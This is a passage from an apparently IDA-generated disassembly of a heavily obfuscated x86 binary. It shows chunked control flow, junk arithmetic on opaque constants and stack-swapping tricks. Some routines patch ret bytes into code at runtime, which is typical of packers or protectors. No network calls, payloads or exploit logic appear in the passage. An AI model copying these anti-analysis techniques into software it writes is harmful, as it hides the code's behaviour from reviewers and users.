xchg ecx, [esp+0Ch+var_C]
mov edi, ecx
mov ecx, ebx
jmp loc_44046E
sub_4423AE endp
; =============== S U B R O U T I N E =======================================
sub_4423C1 proc near ; CODE XREF: sub_4436F6+C9B6p
; ut7h7i2x:00454C87j
; FUNCTION CHUNK AT 0044780D SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00448D75 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044AD48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D47F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451C0F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045246C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004560DB SIZE 00000020 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-10h], eax
loc_4423C8: ; CODE XREF: ut7h7i2x:0043B128j
mov eax, [ebp+8]
mov eax, [eax-10h]
jmp loc_44AD48
sub_4423C1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_4423D3: ; CODE XREF: ut7h7i2x:loc_43BB10j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_4423D4: ; CODE XREF: sub_4565B2+4681j
jmp nullsub_482
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
rol esi, 0Ch
ror esi, 16h
jmp sub_44B85E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450EFA
loc_4423E4: ; CODE XREF: sub_450EFA:loc_43D77Dj
sub ebx, 1E76198Eh
xor ebx, 6BC6ED47h
add ebx, ebp
add ebx, 726974CBh
mov [ebx], al
pop ebx
jmp loc_44B4CE
; END OF FUNCTION CHUNK FOR sub_450EFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_442400: ; CODE XREF: sub_43FF65:loc_44DDE8j
lea eax, [ebp-0Ch]
jmp loc_43BC85
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
mov [ebx], edx
jmp loc_459E52
; ---------------------------------------------------------------------------
sub ebx, edi
jmp sub_44D848
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_442416: ; CODE XREF: sub_449FD5:loc_43B90Bj
; sub_449FD5+5C52j
call sub_453D8B
mov edx, 0F2B89A19h
call sub_44ED9F
call sub_43C3B7
; END OF FUNCTION CHUNK FOR sub_449FD5
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_44242A: ; CODE XREF: sub_449D3B+16AAj
jmp loc_45A4F6
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445F20
loc_44242F: ; CODE XREF: sub_445F20-B50Ej
jmp sub_444E04
; END OF FUNCTION CHUNK FOR sub_445F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459070
loc_442434: ; CODE XREF: sub_459070-1A947j
mov edx, 59F3D198h
mov ebx, [esi]
not ebx
jmp loc_44D9E4
; END OF FUNCTION CHUNK FOR sub_459070
; ---------------------------------------------------------------------------
loc_442442: ; CODE XREF: ut7h7i2x:00445B79j
popf
pushf
; START OF FUNCTION CHUNK FOR sub_439701
loc_442444: ; CODE XREF: sub_439701:loc_445B69j
xor edx, 9C23254Ch
push esi
pushf
push 0C5FC2411h
pop esi
jmp loc_43D104
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
sbb ecx, 0E126491Bh
jmp loc_445DB3
; ---------------------------------------------------------------------------
loc_442462: ; CODE XREF: ut7h7i2x:loc_44C32Fj
push 0ABF4500Ch
pop esi
sub esi, 0DD845F1Bh
cmp esi, 2EEF651Ch
jmp loc_44F666
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_442479: ; CODE XREF: sub_446F56+DB9Dj
pop edi
call sub_457B87
loc_44247F: ; CODE XREF: sub_454F0A+1Cj
jmp loc_443584
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A5C0
loc_442484: ; CODE XREF: sub_43A5C0+B47Fj
jmp loc_43F9F8
; END OF FUNCTION CHUNK FOR sub_43A5C0
; =============== S U B R O U T I N E =======================================
sub_442489 proc near ; DATA XREF: ut7h7i2x:0044B29Bo
; FUNCTION CHUNK AT 0044C39A SIZE 00000005 BYTES
push ebx
loc_44248A: ; CODE XREF: ut7h7i2x:loc_45968Cj
push 0C651DDA5h
push offset loc_45640B
jmp loc_44C39A
sub_442489 endp
; ---------------------------------------------------------------------------
loc_442499: ; CODE XREF: ut7h7i2x:0045134Cj
and ebx, 773A0275h
test ebx, 40000h
jmp loc_441451
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_4424AA: ; CODE XREF: sub_43DBEC-261Ej
ja loc_458979
push 0F5348A31h
jno loc_453F5F
jmp loc_44B5AB
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_4424C0: ; CODE XREF: sub_444029:loc_43E69Cj
; sub_444029+CAF1j
mov eax, [ebp-24h]
mov ecx, [eax+4]
mov eax, [ebp-24h]
mov dx, [eax+2]
jmp loc_43D194
; END OF FUNCTION CHUNK FOR sub_444029
; =============== S U B R O U T I N E =======================================
sub_4424D2 proc near ; DATA XREF: sub_4411BF+5C48o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043BDAD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445081 SIZE 00000007 BYTES
rol ecx, 11h
and eax, ebx
adc ebx, edx
pop ebx
xchg ebp, [esp-4+arg_0]
mov ecx, ebp
pop ebp
pop eax
jmp loc_43BDAD
sub_4424D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4424E6: ; CODE XREF: ut7h7i2x:loc_44C22Cj
; ut7h7i2x:00458B88j
mov ebp, [edx]
; =============== S U B R O U T I N E =======================================
sub_4424E8 proc near ; CODE XREF: sub_440F8E+824Cp
; FUNCTION CHUNK AT 0045418A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00456E4A SIZE 00000010 BYTES
xchg ebx, [esp+0]
pop ebx
test eax, eax
jmp loc_456E4A
sub_4424E8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_4424F3: ; CODE XREF: sub_4544E6-1A835j
push offset loc_44D53D
jmp nullsub_190
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F943
loc_4424FD: ; CODE XREF: sub_44F943-2A4j
jle loc_4432A7
xchg ebp, edi
loc_442505: ; CODE XREF: sub_44F943:loc_440FB8j
mov eax, [ebp-4]
push ecx
push 99C44216h
jmp loc_44AC3B
; END OF FUNCTION CHUNK FOR sub_44F943
; ---------------------------------------------------------------------------
mov eax, 19A5E09Eh
call sub_43AA94
call sub_449E81
; START OF FUNCTION CHUNK FOR sub_455CF9
loc_442522: ; CODE XREF: sub_455CF9+16j
jmp loc_43FDD7
; END OF FUNCTION CHUNK FOR sub_455CF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_442527: ; CODE XREF: sub_44445F+EFF6j
jmp loc_456B93
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ECFF
loc_44252C: ; CODE XREF: sub_43ECFF+Aj
jmp loc_4448EB
; END OF FUNCTION CHUNK FOR sub_43ECFF
; ---------------------------------------------------------------------------
sub esi, 0C034E669h
jmp loc_44C824
; ---------------------------------------------------------------------------
dd 555A8A0Fh, 0F91B0001h, 0F005D8Bh, 0D1F982h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_44254D: ; CODE XREF: sub_43C0DA:loc_448938j
xor ecx, 8575D183h
sub ecx, 0C0147772h
add ecx, 72E3A0C1h
jmp loc_4577A5
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455775
loc_442564: ; CODE XREF: sub_455775-AA6Ej
rol edi, 6
xchg edx, ebp
jmp sub_446E30
; END OF FUNCTION CHUNK FOR sub_455775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_44256E: ; CODE XREF: sub_4442CC:loc_440845j
; sub_459923+Dj
add eax, 55391748h
rol eax, 13h
add eax, 0A53CFE93h
xor eax, 4581C213h
mov ds:dword_44EE44, eax
; END OF FUNCTION CHUNK FOR sub_4442CC
; START OF FUNCTION CHUNK FOR sub_440944
loc_442589: ; CODE XREF: sub_440944+Cj
; sub_444AA3-33B1j
xor eax, 4581C213h
sub eax, 0A53CFE93h
jno loc_43F646
jmp loc_456C5A
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440DA3
loc_4425A0: ; CODE XREF: sub_440DA3:loc_43F2F6j
call sub_453D07
; END OF FUNCTION CHUNK FOR sub_440DA3
; START OF FUNCTION CHUNK FOR sub_44A7D2
loc_4425A5: ; CODE XREF: sub_44A7D2+4j
mov eax, [esp+4+var_4]
push edx
call sub_450EFA
mov eax, 851AF986h
jmp loc_43F883
; END OF FUNCTION CHUNK FOR sub_44A7D2
; ---------------------------------------------------------------------------
loc_4425B8: ; CODE XREF: ut7h7i2x:loc_45881Dj
push ebp
mov ebp, eax
xchg ebp, [esp]
push 0
push 10h
jmp loc_4392C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576C6
loc_4425C7: ; CODE XREF: sub_4576C6-16E32j
test edx, eax
jmp loc_455F22
; END OF FUNCTION CHUNK FOR sub_4576C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_4425CE: ; CODE XREF: sub_43DCFF:loc_43CC39j
; ut7h7i2x:0043CC4Dj
add edi, 0FC6DC539h
xchg edi, [esp-4+arg_0]
jmp loc_44C626
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_4425DC: ; CODE XREF: sub_43DD17-1F26j
test ecx, edi
jmp loc_45A031
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453FFB
loc_4425E3: ; CODE XREF: sub_453FFB-1A5E0j
sub esi, 682E49Dh
add esi, 5F57E447h
; END OF FUNCTION CHUNK FOR sub_453FFB
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_4425EF: ; CODE XREF: sub_447CBE+823j
mov [esi], eax
pop esi
jmp loc_450B39
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_4425F7: ; CODE XREF: sub_455807-FCADj
cmp eax, ebx
jmp loc_439C13
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
loc_4425FE: ; CODE XREF: ut7h7i2x:00445FA4j
sbb ebp, eax
; START OF FUNCTION CHUNK FOR sub_4588BA
loc_442600: ; CODE XREF: sub_4588BA-12928j
add edx, 926C49EEh
call sub_443A65
; END OF FUNCTION CHUNK FOR sub_4588BA
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44260B: ; CODE XREF: sub_439BF8+3BBAj
jmp nullsub_244
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
locret_442610: ; CODE XREF: ut7h7i2x:loc_4470DBj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_442611: ; CODE XREF: sub_4459EE-541Aj
jmp nullsub_474
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
adc esi, ebp
jmp sub_4548DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D9A8
loc_44261D: ; CODE XREF: sub_43D9A8:loc_444260j
; sub_43AB62:loc_44DF93j
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_43D9A8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44261F proc near ; CODE XREF: sub_44BF76-DAFAj
; ut7h7i2x:loc_441593p ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043A70F SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043D5BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044972F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A92C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044BEC8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004509BA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004549C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A49B SIZE 00000015 BYTES
push ebp
mov ebp, esp
push ecx
push esi
push 2AE2A990h
jmp loc_45A49B
sub_44261F endp
; ---------------------------------------------------------------------------
loc_44262E: ; CODE XREF: ut7h7i2x:0045828Ej
push 86A9CAECh
mov edi, 766E014Ch
jmp loc_451C1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_44263D: ; CODE XREF: sub_43AE1A+10EAj
not edi
jo loc_445F12
jmp loc_43BFAE
; END OF FUNCTION CHUNK FOR sub_43AE1A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_277. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_44264B: ; CODE XREF: sub_443A45+1082j
adc edx, eax
jmp loc_454D9C
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
loc_442652: ; CODE XREF: ut7h7i2x:0044704Dj
jp loc_442BC0
pop edx
sub edi, 0C9A53B73h
jmp loc_4408F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_442664: ; CODE XREF: sub_44C273+19C4j
mov ebp, 0F26C0DF4h
jmp loc_455293
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
loc_44266E: ; CODE XREF: ut7h7i2x:00452FBCj
sub ebp, esi
; =============== S U B R O U T I N E =======================================
sub_442670 proc near ; CODE XREF: sub_45A2AD:loc_447983p
xchg edx, [esp+0]
pop edx
push ebp
mov ebp, esp
jmp sub_443DCC
sub_442670 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_44267C: ; CODE XREF: sub_4433C5:loc_44C1BDj
popf
adc ecx, 0C64443CFh
jmp loc_4445CF
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_442688: ; CODE XREF: sub_444A4D:loc_44993Ej
mov esi, edx
xchg esi, [esp+4+var_4]
call sub_4508DB
mov eax, 0A11F455Ah
call sub_45854D
; END OF FUNCTION CHUNK FOR sub_444A4D
; START OF FUNCTION CHUNK FOR sub_452EED
loc_44269C: ; CODE XREF: sub_452EED-4782j
jmp loc_45958E
; END OF FUNCTION CHUNK FOR sub_452EED
; ---------------------------------------------------------------------------
locret_4426A1: ; CODE XREF: ut7h7i2x:0043A0A4j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454C8C
loc_4426A2: ; CODE XREF: sub_454C8C+Aj
jmp loc_45233B
; END OF FUNCTION CHUNK FOR sub_454C8C
; ---------------------------------------------------------------------------
loc_4426A7: ; CODE XREF: ut7h7i2x:00446122j
jmp loc_44DC65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_4426AC: ; CODE XREF: sub_457A66:loc_45716Bj
mov eax, [eax]
or eax, eax
jnz loc_43AE9C
jmp loc_4491FD
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_4426BB: ; CODE XREF: ut7h7i2x:0043E3F6j
jnb loc_43FE47
adc esi, edx
jmp loc_442FE7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_4426C9: ; CODE XREF: sub_452CBB-5E97j
jmp nullsub_220
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
loc_4426CE: ; CODE XREF: ut7h7i2x:0044178Dj
jmp loc_441E58
; ---------------------------------------------------------------------------
loc_4426D3: ; CODE XREF: ut7h7i2x:0043C30Aj
jns loc_44FDD0
loc_4426D9: ; CODE XREF: ut7h7i2x:00445E72j
xchg edx, [ebx]
jmp loc_446A36
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_4426E0: ; CODE XREF: sub_449B8E:loc_4494E3j
; DATA XREF: sub_449FFC+FE4Co
add edx, ebp
add edx, 59E7A19Ch
push offset loc_440182
jmp loc_441E53
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4426F2: ; CODE XREF: sub_439BF8+1476j
jp loc_4500E1
jp loc_43A1C5
mov [edx], ebx
loc_442700: ; CODE XREF: sub_439BF8:loc_4554C9j
push esi
push 750A894Dh
xchg edx, [esp+0Ch+var_C]
mov esi, edx
jmp loc_443FF0
; END OF FUNCTION CHUNK FOR sub_439BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_206. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_442711: ; CODE XREF: sub_450FDE:loc_450FEEj
jmp loc_440405
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_442716: ; CODE XREF: sub_44865D+4FE4j
jmp nullsub_149
; END OF FUNCTION CHUNK FOR sub_44865D
; =============== S U B R O U T I N E =======================================
sub_44271B proc near ; CODE XREF: ut7h7i2x:0043B39Cj
; sub_457A66-900p
; FUNCTION CHUNK AT 0043EC4D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
add edx, 0C49F43D7h
push offset sub_44070C
jmp loc_43EC4D
sub_44271B endp
; ---------------------------------------------------------------------------
loc_44272F: ; CODE XREF: ut7h7i2x:00452C06j
test edx, ecx
jmp loc_44FDEC
; ---------------------------------------------------------------------------
loc_442736: ; DATA XREF: sub_454361+6o
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
call sub_44B211
; START OF FUNCTION CHUNK FOR sub_4393B6
loc_442746: ; CODE XREF: sub_4393B6+41B2j
jmp loc_456E97
; END OF FUNCTION CHUNK FOR sub_4393B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_44274B: ; CODE XREF: sub_452CBB:loc_43DE09j
mov esp, ebp
xchg ecx, [esp+0]
mov ebp, ecx
pop ecx
mov eax, ds:dword_44A89C
or eax, eax
jnz loc_44CE1B
jmp loc_443A8D
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_442766: ; CODE XREF: sub_43CE34+16AFDj
and esi, 293B7A6Ah
loc_44276C: ; CODE XREF: sub_43CE34:loc_453925j
rol eax, 1
xor eax, 631E8C5Ch
call sub_4448AF
jmp loc_44196E
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
jmp loc_44FC7A
; ---------------------------------------------------------------------------
loc_442783: ; DATA XREF: sub_43EF73+4590o
popf
xchg eax, [esp]
jmp loc_44E891
; ---------------------------------------------------------------------------
jnb loc_44C462
jmp sub_43A2F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_442797: ; CODE XREF: sub_43AB62:loc_443759j
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_43AB62
; =============== S U B R O U T I N E =======================================
sub_4427A1 proc near ; DATA XREF: sub_43AB62+11AF1o
xor eax, eax
sub_4427A1 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_450714
loc_4427A3: ; CODE XREF: sub_450714+15j
pop large dword ptr fs:0
add esp, 4
jmp loc_458FB9
; END OF FUNCTION CHUNK FOR sub_450714
; ---------------------------------------------------------------------------
mov [ebp-0Ch], eax
mov word ptr [ebp-6], 0FFFFh
jmp loc_439E46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4427C0: ; CODE XREF: sub_449E96+7j
push 62305B01h
pop eax
jmp loc_4515DC
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_4427CB: ; CODE XREF: sub_446CA0+B7A6j
adc edx, [esp+arg_0]
add esp, 8
mov eax, [eax]
call sub_451E86
loc_4427D9: ; CODE XREF: ut7h7i2x:00456DDBj
jmp loc_452CAA
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_4427DE: ; CODE XREF: sub_43AA94+12628j
jmp loc_44F753
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4427E3 proc near ; DATA XREF: ut7h7i2x:004408EFo
jmp loc_43920B
sub_4427E3 endp
; ---------------------------------------------------------------------------
jmp loc_43F01A
; ---------------------------------------------------------------------------
loc_4427ED: ; CODE XREF: ut7h7i2x:loc_43C316j
push ebp
mov ebp, esp
push ecx
mov esp, ebp
xchg esi, [esp]
jmp loc_4582F6
; ---------------------------------------------------------------------------
loc_4427FB: ; DATA XREF: sub_44EFD1+3o
jnb loc_44B4A7
add eax, 28h
push ebx
push 0E5866023h
pop ebx
sub ebx, 0C8E33BB3h
add ebx, 3D2E6D1h
jmp loc_44E24D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_44281C: ; CODE XREF: sub_43CDBA:loc_43CDC8j
shr ebx, 0Dh
js loc_4551FF
jg loc_446F20
jmp loc_44883D
; END OF FUNCTION CHUNK FOR sub_43CDBA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_444. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_442831: ; CODE XREF: ut7h7i2x:00452A42j
jmp loc_452DA4
; =============== S U B R O U T I N E =======================================
sub_442836 proc near ; CODE XREF: sub_450F4F-F677p
; ut7h7i2x:0044D001j
; FUNCTION CHUNK AT 00452D33 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
add edi, 0F152E534h
mov [edi], eax
pop edi
lea eax, loc_443EFA
mov byte ptr [eax], 0C3h
jmp loc_452D33
sub_442836 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FA50
loc_442851: ; CODE XREF: sub_43FA50+4j
pop edx
jmp loc_446D76
; END OF FUNCTION CHUNK FOR sub_43FA50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_442857: ; CODE XREF: sub_442B3B:loc_44CF6Cj
sbb edx, 0E9F678Bh
jmp loc_443AEA
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_442863: ; CODE XREF: ut7h7i2x:0044F2B4j
jmp sub_43AA94
; ---------------------------------------------------------------------------
loc_442868: ; CODE XREF: ut7h7i2x:0043C1C1j
jmp loc_43FB0E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDA4
loc_44286D: ; CODE XREF: sub_43EDA4-31EAj
jmp loc_454FB8
; END OF FUNCTION CHUNK FOR sub_43EDA4
; =============== S U B R O U T I N E =======================================
sub_442872 proc near ; CODE XREF: sub_442B3B-77D9j
; sub_43A556+98A6p ...
; FUNCTION CHUNK AT 00455E84 SIZE 00000005 BYTES
push offset loc_457E04
jmp loc_455E84
sub_442872 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459C87
loc_44287C: ; CODE XREF: sub_459C87+14j
call sub_43AA94
mov ds:dword_41D168, eax
lea eax, nullsub_10
mov byte ptr [eax], 0C3h
jmp loc_43AB88
; END OF FUNCTION CHUNK FOR sub_459C87
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
jmp loc_43A658
; ---------------------------------------------------------------------------
adc edi, 0B888B5CFh
jnp loc_44B82F
jmp sub_44E9F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E766
loc_4428AF: ; CODE XREF: sub_43E766:loc_440E33j
add eax, 6391C9F7h
mov eax, [eax]
call sub_43B7F7
loc_4428BC: ; CODE XREF: sub_455597-A6A8j
jmp nullsub_62
; END OF FUNCTION CHUNK FOR sub_43E766
; ---------------------------------------------------------------------------
loc_4428C1: ; CODE XREF: ut7h7i2x:0043F049j
adc edi, edx
loc_4428C3: ; CODE XREF: ut7h7i2x:00441318j
jmp loc_448DFA
; =============== S U B R O U T I N E =======================================
sub_4428C8 proc near ; CODE XREF: sub_442B3B-1C2Dp
; ut7h7i2x:00449944j
; FUNCTION CHUNK AT 004429C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D10 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00457440 SIZE 0000000D BYTES
xchg edx, [esp+0]
pop edx
add ecx, ebp
push esi
jmp loc_448D10
sub_4428C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_4428D4: ; CODE XREF: sub_4544E6-84DCj
sub edx, 0D61FA182h
push 266F4C36h
pop eax
loc_4428E0: ; CODE XREF: sub_4544E6:loc_439275j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_45844A
jmp loc_454734
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4428F1: ; CODE XREF: sub_449E96-988Aj
jle loc_43C2C5
push ecx
mov ebp, ecx
loc_4428FA: ; CODE XREF: sub_449E96-989Cj
sub eax, 57FEB35Ah
xor eax, 5C8A2846h
jmp loc_44BAD8
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44290B: ; CODE XREF: sub_43A556+1FB15j
xor ebx, ecx
jmp loc_440302
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_442912: ; CODE XREF: ut7h7i2x:004504B0j
mov esi, [ecx]
and eax, 9E9DB06Eh
sub ebx, esi
loc_44291C: ; CODE XREF: ut7h7i2x:loc_4591C3j
call sub_44E2C4
jmp loc_43FAF3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_442926: ; CODE XREF: sub_44DF79-E5EAj
push 2D0D0C9Dh
pop ebx
and ebx, 0F1D0DF8Eh
test ebx, 4000000h
jmp loc_45A7EA
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44293D: ; CODE XREF: sub_439BF8:loc_452281j
sbb esi, ebx
jl loc_4520D1
jmp loc_4448BD
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_44294A: ; CODE XREF: ut7h7i2x:0043CD98j
jl loc_4449A3
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_442950: ; CODE XREF: sub_4408C2+19D48j
jmp loc_440BBD
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
loc_442955: ; CODE XREF: ut7h7i2x:004588A7j
jmp loc_447B22
; ---------------------------------------------------------------------------
test edx, ebp
jmp loc_43DA29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0C7
loc_442961: ; CODE XREF: sub_43A0C7:loc_43D948j
jz loc_453BD3
loc_442967: ; CODE XREF: sub_4433C5:loc_43FFDDj
jmp loc_44B5A6
; END OF FUNCTION CHUNK FOR sub_43A0C7
; ---------------------------------------------------------------------------
mov eax, 6A74FD15h
push edi
push 5BDA066Eh
pop edi
rol edi, 5
jmp loc_454160
; ---------------------------------------------------------------------------
loc_442980: ; CODE XREF: ut7h7i2x:loc_446463j
jge loc_458B5A
cdq
; =============== S U B R O U T I N E =======================================
sub_442987 proc near ; CODE XREF: sub_44DB1E+B318p
; FUNCTION CHUNK AT 0044CF57 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F7CD SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00457744 SIZE 00000017 BYTES
xchg ebx, [esp+0]
pop ebx
push 81BEB08Eh
pop ebx
rol ebx, 3
or ebx, 30EB2BD2h
jmp loc_457744
sub_442987 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_44299F: ; CODE XREF: sub_4442CC+12958j
or ebx, 0F369FB94h
xor ebx, 45AFDB93h
rol ebx, 0Ah
xor ebx, 0F28E340Ch
popf
sub eax, ebx
pop ebx
jmp loc_44FC4E
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F3CF
loc_4429BD: ; CODE XREF: sub_44F3CF+5j
jmp ds:dword_41D178
